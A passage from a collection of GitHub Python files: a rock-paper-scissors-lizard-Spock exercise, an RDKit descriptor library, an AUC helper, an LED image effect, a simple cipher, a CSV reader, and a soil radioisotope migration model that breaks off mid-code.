numbers\n# as follows:\n#\n# 0 - rock\n# 1 - Spock\n# 2 - paper\n# 3 - lizard\n# 4 - scissors\n\n# helper functions\n\nimport random\n\ndef name_to_number(name):\n # delete the following pass statement and fill in your code below\n \n if name == \"rock\":\n return 0\n elif name == \"Spock\":\n return 1\n elif name == \"paper\":\n return 2\n elif name == \"lizard\":\n return 3\n elif name == \"scissors\":\n return 4\n else:\n return \"Error: name_to_number function!\"\n\n # convert name to number using if/elif/else\n # don't forget to return the result!\n\n\ndef number_to_name(number):\n # delete the following pass statement and fill in your code below\n \n if number == 0:\n return \"rock\"\n elif number == 1:\n return \"Spock\"\n elif number == 2:\n return \"paper\"\n elif number == 3:\n return \"lizard\"\n elif number == 4:\n return \"scissors\"\n else:\n return \"Error: number_to_name function!\"\n \n # convert number to a name using if/elif/else\n # don't forget to return the result!\n \n\ndef rpsls(player_choice): \n # delete the following pass statement and fill in your code below\n \n \n # print a blank line to separate consecutive games\n \n print()\n\n # print out the message for the player's choice\n \n print(\"Player's choice is... \" + '\"' + player_choice + '\"')\n\n # convert the player's choice to player_number using the function name_to_number()\n \n player_choice = name_to_number(player_choice)\n\n # compute random guess for comp_number using random.randrange()\n \n comp_number = random.randrange(0,5)\n\n # convert comp_number to comp_choice using the function number_to_name()\n \n comp_choice = number_to_name(comp_number)\n \n # print out the message for computer's choice\n \n print(\"Computer's choice is... \" + '\"' + comp_choice + '\"')\n\n # compute difference of comp_number and player_number modulo five\n \n if isinstance(player_choice, int) == True:\n winner = (player_choice - comp_number) % 5\n else:\n winner = \"Error: Value is not an integer!\"\n \n # use if/elif/else to determine winner, print winner message\n \n if (winner > 0) and (winner <= 2):\n print(\"The winner is... Player!\")\n elif (winner > 2) and (winner <= 4):\n print(\"The winner is... Computer!\")\n elif winner == 0:\n print(\"It is a draw! Try again...\")\n else:\n print(\"Error: Invalid input!\")\n\n \n# test your code - THESE CALLS MUST BE PRESENT IN YOUR SUBMITTED CODE\nrpsls(\"rock\")\nrpsls(\"Spock\")\nrpsls(\"paper\")\nrpsls(\"lizard\")\nrpsls(\"scissors\")\n\n# always remember to check your completed program against the grading rubric\n\n\n","repo_name":"notsky23/Rock-Paper-Scissors-Lizzard-Spock","sub_path":"Rock-Paper-Scissors-Lizard-Spock.py","file_name":"Rock-Paper-Scissors-Lizard-Spock.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15288554294","text":"# This is a library of 24 electrostatic potential based molecular descriptors \r\n# based on Hunter, C. A. (2004). Angewandte Chemie - International Edition, 43(40), 5310–5324\r\n# https://doi.org/10.1002/anie.200301739\r\n# This code was created by Andre Frade (with support of Patrick McCabe and Richard Cooper)\r\n\r\ntry:\r\n import os\r\n import pickle\r\n import numpy as np\r\n import pandas as pd\r\n from collections import namedtuple\r\n from rdkit import Chem\r\n from rdkit.Chem import AllChem\r\n from rdkit.ML.Descriptors import MoleculeDescriptors\r\n from rdkit.Chem.MolStandardize import rdMolStandardize\r\nexcept ImportError as e:\r\n print('Error {}'.format(e))\r\n\r\nclass ElectrostaticPotential:\r\n\r\n def __init__(self):\r\n \"\"\"\r\n from rdkit import Chem\r\n mol = Chem.MolFromSmiles(smiles)\r\n \r\n ep = ElectrostaticPotential()\r\n ep_values = ep.calc_electrostatic_potential_descriptors(mol)\r\n \r\n ep_values is a named tuple containing: MaxAlpha MaxBeta MinAlpha MinBeta TotalAlpha TotalBeta \r\n AverageAlpha AverageBeta AlphaMolWtNormalised BetaMolWtNormalised AlphaVSANormalised BetaVSANormalised\r\n AlphaLogPNormalised BetaLogPNormalised Alpha_VSA0 Alpha_VSA1 Alpha_VSA2 Alpha_VSA3 Alpha_VSA4 Beta_VSA0\r\n Beta_VSA1 Beta_VSA2 Beta_VSA3 Beta_VSA4')\r\n \r\n :param ht_filename: absolute filename of csv file containing alpha, beta group values\r\n Alpha and beta group values taken from https://doi.org/10.1002/anie.200301739\r\n :param complexgroup_filename: absolute filename of metadata dict\r\n A complex group is a supergroup that contains subgroups. For example phenol contains a benzene and an alcohol\r\n \"\"\"\r\n \r\n \r\n import pkg_resources\r\n ht_filepath = pkg_resources.resource_filename('electrostatic_potential', 'data/ABvalues.csv')\r\n cg_filepath = pkg_resources.resource_filename('electrostatic_potential', 'data/complex_groups')\r\n \r\n with open(complexgroup_filepath, \"rb\") as complexgroup_file:\r\n self._complex_groups = pickle.load(cg_filepath)\r\n \r\n self._ht_df = pd.read_csv(ht_filepath) \r\n self._smarts_patterns = self._ht_df.smarts.values\r\n self._neutral_smiles = ''\r\n self._all_matches = {}\r\n self._all_indices = {}\r\n self._adjusted_matches = {}\r\n self._adjusted_indices = {}\r\n\r\n def _uncharge_molecule(self, mol):\r\n \r\n '''Neutralizes molecular charges for functional group identification.\r\n It may fail.'''\r\n \r\n smiles = Chem.MolToSmiles(mol)\r\n\r\n if '+' in smiles or '-' in smiles:\r\n uncharger = rdMolStandardize.Uncharger()\r\n mol = uncharger.uncharge(mol) \r\n \r\n self._neutral_smiles = Chem.MolToSmiles(mol)\r\n return mol\r\n\r\n def _find_group(self, smarts, mol):\r\n\r\n indices = []\r\n\r\n try:\r\n patt = Chem.MolFromSmarts(smarts)\r\n indices = [list(x) for x in mol.GetSubstructMatches(patt)]\r\n except RuntimeError as e:\r\n print('Error {} {}'.format(smarts, e))\r\n\r\n return indices\r\n\r\n def _find_matches(self, mol):\r\n\r\n self._all_matches = {}\r\n self._all_indices = {} \r\n \r\n for group in self._smarts_patterns:\r\n indices = self._find_group(group, mol)\r\n\r\n if len(indices) > 0:\r\n group = self._ht_df.group.loc[self._ht_df.smarts == group].values[0]\r\n self._all_matches[group] = len(indices)\r\n self._all_indices[group] = indices\r\n \r\n def _adjust_matches(self):\r\n \r\n adjusted_indices = dict(self._all_indices)\r\n \r\n # [1] ADJUST GROUP OCCURENCE COUNT - check if no atom belongs to more than one group occurence\r\n # =======================================================================\r\n \r\n #for i in adjusted_indices: print(i, adjusted_indices[i])\r\n for group in adjusted_indices:\r\n group_events = adjusted_indices[group]\r\n remove_ =[]\r\n for i in range(len(group_events)-1):\r\n if set(group_events[i]) & set(group_events[i+1]):\r\n remove_.append(group_events[i])\r\n for r in remove_:\r\n adjusted_indices[group].remove(r)\r\n \r\n # [2] ADJUST COMPLEX GROUP COUNT - remove subgroup counts\r\n # =======================================================================\r\n \r\n # get indices of cg and their potential sg identified in molecule\r\n # -----------------------------------------------------------------------\r\n for cg in self._complex_groups: # for each cg found in mol\r\n \r\n if not cg in adjusted_indices:\r\n continue\r\n \r\n for cg_indices in adjusted_indices[cg]: # get its indices\r\n temp = [] # accumulates sg indices overlaping each cg\r\n \r\n for sg in self._complex_groups[cg]: # and for the corresponding subgroups, get their indices too\r\n \r\n if not sg in adjusted_indices:\r\n continue\r\n \r\n # check whether any of the matches of a group is a sg (search by indices overlap)\r\n # ----------------------------------------------------------------------- \r\n for sg_indices in adjusted_indices[sg]:\r\n \r\n if set(cg_indices) & set(sg_indices): # check if sg and cg indices overlap\r\n\r\n if sg_indices not in temp: # if so, store the sg indices once\r\n temp.append(sg_indices)\r\n \r\n # keep only cg and simpler ones that dont act as sg\r\n # ----------------------------------------------------------------------- \r\n if sg in adjusted_indices: # keep simpler groups that dont act as sg\r\n keep = [x for x in adjusted_indices[sg] if x not in temp]\r\n adjusted_indices[sg] = keep\r\n\r\n self._adjusted_indices = { k:v for k, v in adjusted_indices.items() if len(v) > 0}\r\n self._adjusted_matches = { k:len(v) for k, v in adjusted_indices.items() if len(v) > 0}\r\n \r\n def _max_min_alpha_beta(self):\r\n\r\n max_alpha = 0\r\n max_beta = 0\r\n min_alpha = 0\r\n min_beta = 0\r\n\r\n groups = [group for group in self._adjusted_matches]\r\n alphas = self._ht_df.alpha.loc[self._ht_df.group.isin(groups)].values\r\n betas = self._ht_df.beta.loc[self._ht_df.group.isin(groups)].values\r\n\r\n if len(alphas) > 0:\r\n max_alpha = max(alphas)\r\n min_alpha = min(alphas)\r\n\r\n if len(betas) > 0:\r\n max_beta = max(betas)\r\n min_beta = min(betas)\r\n\r\n return max_alpha, max_beta, min_alpha, min_beta\r\n \r\n def _average_total_alpha_beta(self):\r\n \r\n total_alpha = 0\r\n total_beta = 0\r\n average_alpha = 0\r\n average_beta = 0\r\n \r\n groups = []\r\n for group in self._adjusted_matches:\r\n for i in range (self._adjusted_matches[group]): \r\n groups.append(group)\r\n \r\n alphas = [self._ht_df.alpha.loc[self._ht_df.group == group].values[0] for group in groups]\r\n betas = [self._ht_df.beta.loc[self._ht_df.group == group].values[0] for group in groups]\r\n \r\n if len(alphas) > 0:\r\n total_alpha = round(np.sum(alphas), 1)\r\n average_alpha = round(np.mean(alphas), 1)\r\n\r\n if len(betas) > 0:\r\n total_beta = round(np.sum(betas), 1)\r\n average_beta = round(np.mean(betas), 1)\r\n \r\n return total_alpha, total_beta, average_alpha, average_beta\r\n \r\n def _normalised_alpha_beta(self, mol, total_alpha, total_beta):\r\n \r\n alpha_mw_norm, beta_mw_norm = 0, 0\r\n alpha_vsa_norm, beta_vsa_norm = 0, 0\r\n alpha_logp_norm, beta_logp_norm = 0, 0\r\n \r\n # by MolWt\r\n '''The average molecular weight of the molecule'''\r\n obj = MoleculeDescriptors.MolecularDescriptorCalculator(['MolWt'])\r\n res = obj.CalcDescriptors(mol)\r\n mw = res[0]\r\n if mw > 0:\r\n alpha_mw_norm = round(total_alpha/mw,3)\r\n beta_mw_norm = round(total_beta/mw,3)\r\n \r\n # by VSA\r\n '''Labute. P. J. Mol. Graph. Mod. _18_ 464-477 (2000)'''\r\n vsa = Chem.MolSurf.LabuteASA(mol)\r\n if vsa > 0:\r\n alpha_vsa_norm = round(total_alpha/vsa,3)\r\n beta_vsa_norm = round(total_beta/vsa,3) \r\n \r\n # by LogP\r\n '''S. A. Wildman and G. M. Crippen JCICS 39 868-873 (1999)'''\r\n logp = Chem.Crippen.MolLogP(mol)\r\n if logp > 0: \r\n alpha_logp_norm = round(total_alpha/logp,3)\r\n beta_logp_norm = round(total_beta/logp,3) \r\n \r\n return alpha_mw_norm, beta_mw_norm, alpha_vsa_norm, beta_vsa_norm, alpha_logp_norm, beta_logp_norm\r\n\r\n def _VSA_alpha_beta(self, mol):\r\n \r\n ''' calculates Labute's Approximate Surface Area.\r\n Definition from P. Labute's article in the Journal of the Chemical Computing Group\r\n and J. Mol. Graph. Mod. _18_ 464-477 (2000)\r\n '''\r\n \r\n # calculate the per-atom contributions to the surface area\r\n (ats, hs)= Chem.rdMolDescriptors._CalcLabuteASAContribs(mol, includeHs = True)\r\n atomic_vsa = [round(vsa, 3) for vsa in ats]\r\n total_vsa = np.sum(atomic_vsa)\r\n \r\n # calculate the per-atom contributions to the Gasteiger partial charge\r\n # this dictates the most positive (donor) and negative (acceptor) atom of the group\r\n AllChem.ComputeGasteigerCharges(mol)\r\n atomic_pcharge = [round(mol.GetAtomWithIdx(i).GetDoubleProp('_GasteigerCharge'), 3) for i in range(mol.GetNumAtoms())]\r\n\r\n res_alpha = {}\r\n res_beta = {}\r\n \r\n for group in self._adjusted_indices: \r\n \r\n vsa_alpha = 0\r\n vsa_beta = 0\r\n \r\n # for each group event, get vsa of 'donnor' and 'acceptor' atoms\r\n for event in self._adjusted_indices[group]:\r\n \r\n # get p charge for elements in group\r\n local_pcharge = [atomic_pcharge[atom] for atom in event]\r\n local_vsa = [atomic_vsa[atom] for atom in event]\r\n \r\n # identify alpha (min p charge) and beta (max p charge) atoms, and retrieve their vsa contribution\r\n vsa_alpha += np.sum([local_vsa[i] for i in range(len(event)) if local_pcharge[i] == min(local_pcharge)])\r\n vsa_beta += np.sum([local_vsa[i] for i in range(len(event)) if local_pcharge[i] == max(local_pcharge)])\r\n \r\n # get group's alpha and beta value\r\n alpha = self._ht_df.alpha.loc[self._ht_df.group == group].values[0]\r\n beta = self._ht_df.beta.loc[self._ht_df.group == group].values[0]\r\n \r\n # store normalised vsa's for those alphas and betas\r\n res_alpha[alpha]= vsa_alpha/total_vsa\r\n res_beta[beta]= vsa_beta/total_vsa\r\n \r\n a_VSA0, a_VSA1, a_VSA2, a_VSA3, a_VSA4 = self._alpha_VSA(res_alpha)\r\n b_VSA0, b_VSA1, b_VSA2, b_VSA3, b_VSA4 = self._beta_VSA(res_beta)\r\n \r\n return a_VSA0, a_VSA1, a_VSA2, a_VSA3, a_VSA4, b_VSA0, b_VSA1, b_VSA2, b_VSA3, b_VSA4\r\n \r\n def _alpha_VSA(self, dic):\r\n \r\n ''' alpha: 5 bins, 1 unit interval [0], ]0, 1] ]1, 2] ]2, 3], ]3, inf['''\r\n\r\n alpha_VSA0 = 0\r\n alpha_VSA1 = 0\r\n alpha_VSA2 = 0\r\n alpha_VSA3 = 0\r\n alpha_VSA4 = 0\r\n\r\n for alpha in dic:\r\n\r\n if alpha == 0:\r\n alpha_VSA0 += dic[alpha]\r\n\r\n elif 0 < alpha <=1:\r\n alpha_VSA1 += dic[alpha]\r\n\r\n elif 1 < alpha <=2:\r\n alpha_VSA2 += dic[alpha]\r\n\r\n elif 2 < alpha <=3:\r\n alpha_VSA3 += dic[alpha]\r\n\r\n elif 3 < alpha:\r\n alpha_VSA4 += dic[alpha]\r\n\r\n return round(alpha_VSA0,3), round(alpha_VSA1,3), round(alpha_VSA2,3), round(alpha_VSA3,3), round(alpha_VSA4,3)\r\n \r\n def _beta_VSA(self, dic):\r\n \r\n ''' beta: 5 bins, 2 units interval [0, 2], ]2, 4] ]4, 6], ]6, 8], ]8, inf['''\r\n \r\n beta_VSA0 = 0\r\n beta_VSA1 = 0\r\n beta_VSA2 = 0\r\n beta_VSA3 = 0\r\n beta_VSA4 = 0\r\n\r\n for beta in dic:\r\n\r\n if 0 <= beta <=2:\r\n beta_VSA0 += dic[beta]\r\n\r\n elif 2 < beta <=4:\r\n beta_VSA1 += dic[beta]\r\n\r\n elif 4 < beta <=6:\r\n beta_VSA2 += dic[beta]\r\n\r\n elif 6 < beta <=8:\r\n beta_VSA3 += dic[beta]\r\n\r\n elif 8 < beta:\r\n beta_VSA4 += dic[beta]\r\n\r\n return round(beta_VSA0,3), round(beta_VSA1,3), round(beta_VSA2,3), round(beta_VSA3,3), round(beta_VSA4,3)\r\n \r\n def neutral_smiles(self):\r\n \r\n return self._neutral_smiles \r\n\r\n def adjusted_matches(self):\r\n \r\n return self._adjusted_matches\r\n \r\n def all_matches(self):\r\n\r\n return self._all_matches\r\n \r\n def calc_electrostatic_potential_descriptors(self, mol):\r\n \r\n '''\r\n :param mol: a mol object\r\n :return ep_values: a namedtuple containing \r\n MaxAlpha MaxBeta MinAlpha MinBeta \r\n TotalAlpha TotalBeta AverageAlpha AverageBeta \r\n AlphaMolWtNormalised BetaMolWtNormalised \r\n AlphaVSANormalised BetaVSANormalised \r\n AlphaLogPNormalised BetaLogPNormalised \r\n Alpha_VSA0 Alpha_VSA1 Alpha_VSA2 Alpha_VSA3 Alpha_VSA4 \r\n Beta_VSA0 Beta_VSA1 Beta_VSA2 Beta_VSA3 Beta_VSA4\r\n .\r\n \r\n - MaxAlpha, MaxBeta: maximum alpha and beta values in the molecule\r\n - MinAlpha, MinBeta: minimum alpha and beta values in the molecule\r\n - TotalAlpha, TotalBeta: total sum of all alpha and beta values in a molecule\r\n - AverageAlpha, AverageBeta: total sum of all alpha and beta values in a molecule, averaged by nr of identified functional groups\r\n - AlphaMolWtNormalised, BetaMolWtNormalised: total sum of all alpha and beta values in a molecule normalised by MolWt\r\n - AlphaVSANormalised, BetaVSANormalised: total sum of all alpha and beta values in a molecule normalised by van der Waals surface area\r\n - AlphaLogPNormalised, BetaLogPNormalised: total sum of all alpha and beta values in a molecule normalised by LogP\r\n - Alpha_VSA0, Alpha_VSA1, Alpha_VSA2, Alpha_VSA3, Alpha_VSA4: fraction of surface area with a value of alpha between x and y\r\n - Beta_VSA0, Beta_VSA1, Beta_VSA2, Beta_VSA3, Beta_VSA4: fraction of surface area with a value of beta between x and y\r\n '''\r\n \r\n ep_values = namedtuple('ep_values', 'MaxAlpha MaxBeta MinAlpha MinBeta TotalAlpha TotalBeta AverageAlpha AverageBeta AlphaMolWtNormalised BetaMolWtNormalised AlphaVSANormalised BetaVSANormalised AlphaLogPNormalised BetaLogPNormalised Alpha_VSA0 Alpha_VSA1 Alpha_VSA2 Alpha_VSA3 Alpha_VSA4 Beta_VSA0 Beta_VSA1 Beta_VSA2 Beta_VSA3 Beta_VSA4')\r\n \r\n mol = self._uncharge_molecule(mol)\r\n\r\n self._find_matches(mol)\r\n\r\n self._adjust_matches()\r\n\r\n ep_values.MaxAlpha, ep_values.MaxBeta, ep_values.MinAlpha, ep_values.MinBeta = self._max_min_alpha_beta()\r\n \r\n ep_values.TotalAlpha, ep_values.TotalBeta, ep_values.AverageAlpha, ep_values.AverageBeta = self._average_total_alpha_beta() \r\n \r\n ep_values.AlphaMolWtNormalised, ep_values.BetaMolWtNormalised, ep_values.AlphaVSANormalised, ep_values.BetaVSANormalised, ep_values.AlphaLogPNormalised, ep_values.BetaLogPNormalised = self._normalised_alpha_beta(mol, ep_values.TotalAlpha, ep_values.TotalBeta)\r\n\r\n ep_values.Alpha_VSA0, ep_values.Alpha_VSA1, ep_values.Alpha_VSA2, ep_values.Alpha_VSA3, ep_values.Alpha_VSA4, ep_values.Beta_VSA0, ep_values.Beta_VSA1, ep_values.Beta_VSA2, ep_values.Beta_VSA3, ep_values.Beta_VSA4 = self._VSA_alpha_beta(mol) \r\n\r\n return ep_values\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"apfrade/code_sample","sub_path":"electrostatic_potential/electrostatic_potential.py","file_name":"electrostatic_potential.py","file_ext":"py","file_size_in_byte":16808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"55740658","text":"from sklearn.metrics import roc_auc_score\r\nfrom numpy.random import seed\r\nimport tensorflow as tf\r\n\r\nseed(1)\r\ntf.random.set_seed(2)\r\n\r\n\r\ndef calculate_AUC(dataset, generator, predictions):\r\n \"\"\"\r\n :param dataset: dataset that is fed to generator\r\n :param generator: generator feeding images and labels to model\r\n :param predictions: predictions made on the validation set using the trained model\r\n :return: One-Vs-Rest AUC for multiclass case, 'normal' AUC for binary case\r\n \"\"\"\r\n # compute OneVsRest multi-class weighted AUC\r\n if (dataset == 'stl10') | (dataset == 'sti10'):\r\n # STL10 and STI10 are given to .flow() generators, so labels are stored in y-object of generator\r\n OneVsRest_auc = roc_auc_score(generator.y, predictions, multi_class='ovr', average='weighted')\r\n if (dataset == \"isic\") | (dataset == 'textures') | (dataset == 'kimia'):\r\n # .flow_from_dataframe() is used to get data, labels can be collected by calling classes object of generator\r\n OneVsRest_auc = roc_auc_score(generator.classes, predictions, multi_class='ovr', average='weighted')\r\n # in binary case, compute 'normal' AUC\r\n elif (dataset == 'chest') | (dataset == 'pcam-small') | (dataset == 'pcam-middle'):\r\n # .flow_from_dataframe() is used to get data, labels can be collected by calling classes object of generator\r\n OneVsRest_auc = roc_auc_score(generator.classes, predictions)\r\n print(f'Validation auc: {OneVsRest_auc}')\r\n\r\n return OneVsRest_auc\r\n\r\n","repo_name":"vcheplygina/cats-scans","sub_path":"src/evaluation/auc_evaluation.py","file_name":"auc_evaluation.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"22182305995","text":"import sys\nfrom PIL import Image\nfrom os.path import exists\n\ndef run(matrix, config):\n \"\"\"show an png image\"\"\"\n effect_dir = config['effect_dir']\n usage = \"Usage: ./run.sh image image-name.png\"\n if len(config['argv']) != 1:\n print(usage)\n sys.exit()\n\n image_file = effect_dir + '/' + config['argv'][0]\n if not exists(image_file):\n print(\"Error: file not found\")\n print(usage)\n sys.exit()\n\n # The actual image\n image = Image.open(image_file)\n\n # send the image to matrix\n matrix.image(image)\n matrix.show()\n\n # in virtual env this lets the image hang out for 5 seconds\n matrix.delay(5000)\n","repo_name":"natelewis/pi-led-matrix","sub_path":"effects/image/effect.py","file_name":"effect.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"27017957663","text":"\"\"\"\ntake in a message and a code text, and shift each letter of the message\nby the corresponding letter in the code text\n\"\"\"\n\nalphabet = set('qwertyuiopasdfghjklzxcvbnm')\nletters = 'abcdefghijklmnopqrstuvwxyz'\nitoc = '\\\\' + letters # to start at 1\nctoi = {c: i+1 for (i,c) in enumerate(letters)}\n\ndef shift_up(c: str, delta: str) -> str:\n i = ctoi[c] + ctoi[delta]\n if i > 26:\n i -= 26\n return itoc[i]\n\n\ndef shift_down(c: str, delta: str) -> str:\n i = ctoi[c] - ctoi[delta]\n if i < 1:\n i += 26\n return itoc[i]\n\n\ndef clean(code: str):\n code = code.lower()\n code = filter(lambda c: c in alphabet, code)\n code = ''.join(code)\n return code\n\n\ndef encode_decode(message, code, shift):\n message = message.lower()\n code = clean(code)\n i = 0 # msg index\n j = 0 # code index\n answer = []\n while i < len(message) and j < len(code):\n c = message[i]\n delta = code[j]\n if c in alphabet:\n answer.append(shift(c, delta))\n i += 1\n j += 1\n else:\n answer.append(c)\n i += 1\n answer = ''.join(answer)\n return answer\n\ndef encode(message, code):\n return encode_decode(message, code, shift_up)\n\n\ndef decode(message, code):\n return encode_decode(message, code, shift_down)\n\n\ndef encode_decode_io(tranform):\n with open('zodiac_message.txt', 'r') as f:\n message = f.read()\n with open('zodiac_code.txt', 'r') as f:\n code = f.read()\n print(tranform(message, code))\n\ndef decode_io():\n encode_decode_io(decode)\n\n\ndef encode_io():\n encode_decode_io(encode)\n\n\nif __name__ == '__main__':\n encode_io()","repo_name":"quasarbright/quasarbright.github.io","sub_path":"python/zodiac.py","file_name":"zodiac.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71773098385","text":"import csv\n\nwith open(\"Customer.csv\",\"r\",encoding=\"utf-8\") as file:\n data = csv.reader(file, delimiter=\",\")\n columns=next(data)\n rows=tuple(data)\nx=[]\nfor row in rows:\n x.append(row[8])\n\nprint(sorted(set(x)))","repo_name":"Kacyk27/Kacyk27-103-exercises-Advanced-Python-Programming","sub_path":"Exercise042.py","file_name":"Exercise042.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33558464012","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nMain executable file of model for evaluation radioisotopes horisontal migration into close lake from its catchment area\n\"\"\"\n\nimport sys\nimport os\nimport csv\nimport math\nimport numpy as np\nfrom datetime import datetime\nfrom tqdm import tqdm_notebook\n\nnp.random.seed(datetime.now().second)\ndatafile = 'perstok_data.csv'\noutfile = 'perstok_new.csv'\n\ncs137_decay_constant = 0.0229769\nam241_decay_constant = 0.0016023\ncs137_infiltration_constant = 0.0273\nam241_infiltration_constant = 0.0298\ncs137_infiltration_constant_2 = 0.0677\nam241_infiltration_constant_2 = 0.0658\n\nclass SoilCell:\n \"\"\"\n The class define cell with soil and plant cover wich is a main element of the model\n \"\"\"\n def __init__(self, x, y, elevation, land_type, cs_137=30000.0, am_241=1.0, size=100.0, soil_density=1.35, cs137_s_part=0.0015, w0=3.0):\n isotope_layer = {}\n self.x = x\n self.y = y\n self.soil_density = soil_density + 0.02*np.random.randn()\n self.elevation = elevation\n self.land_type = land_type\n self.input_cells = []\n self.up_way_cells = []\n self.output_cell = None\n self.model_R = 600000.0 + 50*np.random.randn()\n self.model_P = 1\n if self.land_type == 'f':\n self.model_K = 0.020 + 0.001*np.random.randn()\n self.model_C = 0.006 + 0.0003*np.random.randn()\n self.model_LS = 0.1 + 0.001*np.random.randn()\n elif self.land_type == 'l':\n self.model_K = 0.0785 + 0.001*np.random.randn()\n self.model_C = 0.05 + 0.0003*np.random.randn()\n self.model_LS = 0.3 + 0.001*np.random.randn()\n else :\n self.model_K = 0.0\n self.model_C = 0.0\n self.model_LS = 0.0\n self.size = size\n self.angle = 0\n self.uklon = 0\n self.soil_loss = 0\n self.sediment_inflow = 0\n self.max_outflow_capicity = 0\n self.w0 = w0 + 0.2*np.random.randn() # запас воды в миграционноактивном слое почвы на кг/1 м^{2}\n self.cs137 = {'top_layer': {'activity_concentration': cs_137 + 0.05*cs_137*np.random.randn(), \n 'zapas': 0.0,\n 'soluble_part': cs137_s_part + 0.0002*np.random.randn(), \n 'soluble_zapas': 0.0, \n 'activity_loss': 0.0,\n 'liquid_flow': 0.0}, \n 'bottom_layer': {'activity_concentration': 0, \n 'zapas': 0}, \n 'decay_constant': cs137_decay_constant,\n 'infiltration_constant': cs137_infiltration_constant,\n 'inflow': 0.0,\n 'name': 'Cs-137'\n }\n self.cs137['top_layer']['zapas'] = self.size**2 * self.cs137['top_layer']['activity_concentration'] * self.soil_density*(0.2*10*10)\n self.cs137['top_layer']['soluble_zapas'] = self.cs137['top_layer']['soluble_part'] * self.cs137['top_layer']['zapas']\n\n self.am241 = {'top_layer': {'activity_concentration': am_241 + 0.1*am_241*np.random.randn(), \n 'zapas': 0.0,\n 'activity_loss': 0.0,\n 'soluble_part': 0.0,\n 'soluble_zapas': 0.0,\n 'liquid_flow': 0.0}, \n 'bottom_layer': {'activity_concentration': 0, \n 'zapas': 0},\n 'decay_constant': am241_decay_constant,\n 'infiltration_constant': am241_infiltration_constant,\n 'inflow': 0.0,\n 'name': 'Am-241'\n }\n self.am241['top_layer']['zapas'] = self.size**2 * self.am241['top_layer']['activity_concentration'] * self.soil_density*(0.2*10*10)\n if self.land_type == 'f':\n self.cs137['infiltration_constant'] = cs137_infiltration_constant_2\n self.am241['infiltration_constant'] = am241_infiltration_constant_2\n self.isotopes = [self.cs137, self.am241]\n\n def calculateAngle(self):\n max_diff = 0\n for cell in self.up_way_cells:\n if abs(cell.x-self.x) <= 1 and abs(cell.y-self.y) <= 1 and cell.land_type != 'w':\n diff = abs(self.elevation-cell.elevation)\n if diff > max_diff:\n max_diff = diff\n if abs(cell.x-self.x) + abs(cell.y-self.y) == 1 :\n length = 100\n else : \n length = 141.4\n if self.output_cell :\n if abs(self.elevation - self.output_cell.elevation) > max_diff and self.output_cell.land_type != 'w':\n max_diff = abs(self.elevation - self.output_cell.elevation)\n if abs(self.output_cell.x-self.x) + abs(self.output_cell.y-self.y) == 1 :\n length = 100\n else : \n length = 141.4\n if max_diff > 0 :\n self.uklon = max_diff / length\n self.angle = max_diff/(math.sqrt(length**2+max_diff**2))\n\n def calculateLS(self) :\n self.calculateAngle()\n # TODO Попробовать с этим вычислением и по-умолчанию\n #self.model_LS = ((1+len(self.up_way_cells))*self.size/22.1)**0.4 * (self.angle*0.01745/0.09)**1.4 \n\n def calculate_max_outflow_capicity(self):\n if self.uklon > 0:\n tau_0 = 1005 * 9.8 * (0.003*np.random.randn() + 0.033) * self.uklon \n g_s = 3.912 * tau_0 * (tau_0 - (0.03*np.random.randn() + 0.22)) / 9.8**2\n s_w = 4 * (2*np.random.randn() + 30) * (0.003*np.random.randn() + 0.033)\n self.max_outflow_capicity = g_s * s_w * (2*np.random.randn()+20)\n else:\n self.max_outflow_capicity = 0\n\n def findInputCells(self, catchment):\n stack = [self]\n added = []\n self.input_cells = []\n while stack :\n current = stack.pop()\n added.append(current)\n for cell in catchment :\n if abs(cell.x-self.x) <= 1 and abs(cell.y-self.y) <= 1 and cell.elevation > self.elevation :\n if (cell not in added) and (cell not in stack) and cell != current and cell != self :\n stack.append(cell)\n self.input_cells.append(cell)\n \n def findOutputCell(self, catchment):\n max_diff = 0\n self.output_cell = self.output_cell_storage = None\n for cell in catchment :\n if abs(cell.x-self.x) <= 1 and abs(cell.y-self.y) <= 1 and cell.elevation < self.elevation :\n if cell != self :\n self.output_cell = cell\n self.output_cell_storage = cell\n max_diff = self.elevation - cell.elevation\n\n def findUpWayCells(self, catchment) :\n stack = [self]\n added = []\n while stack :\n current = stack.pop()\n added.append(current)\n for cell in catchment :\n if cell.output_cell == current :\n if (cell not in added) and (cell not in stack) and cell != current and cell != self :\n stack.append(cell)\n self.up_way_cells.append(cell)\n self.up_way_cells_storage = self.up_way_cells[:]\n\n def calculateSoilLoss(self) :\n if self.land_type != 'w' :\n self.soil_loss = self.model_R * self.model_K * self.model_LS * self.model_C * self.model_P\n\n def calculateActivityLoss(self) :\n if self.land_type != 'w' :\n for isotope in self.isotopes :\n isotope['top_layer']['activity_loss'] = self.soil_loss * isotope['top_layer']['activity_concentration']\n\n def __repr__(self):\n return (\"\\n x=%d; y=%d; h=%d\" % (self.x, self.y, self.elevation))\n\n def calculate_liquid_outflow(self, w_e=20.0, n_fl=3):\n fool_capicity = 25 + 2*np.random.randn() # 25 l -- volume of soil per 1 sq.m. wetted in the event\n w_fl = self.w0 + w_e - fool_capicity\n if w_fl < 0 :\n w_fl = 0\n for isotope in self.isotopes:\n if isotope['top_layer']['soluble_part'] > 0 :\n isotope['top_layer']['liquid_flow'] = n_fl * w_fl * ((isotope['top_layer']['zapas'] * isotope['top_layer']['soluble_part'])/(self.w0 + w_e))\n\n def infiltration(self):\n if self.land_type != 'w':\n for isotop in self.isotopes:\n isotop['top_layer']['zapas'] -= isotop['infiltration_constant'] * isotop['top_layer']['zapas']\n isotop['bottom_layer']['zapas'] += isotop['infiltration_constant'] * 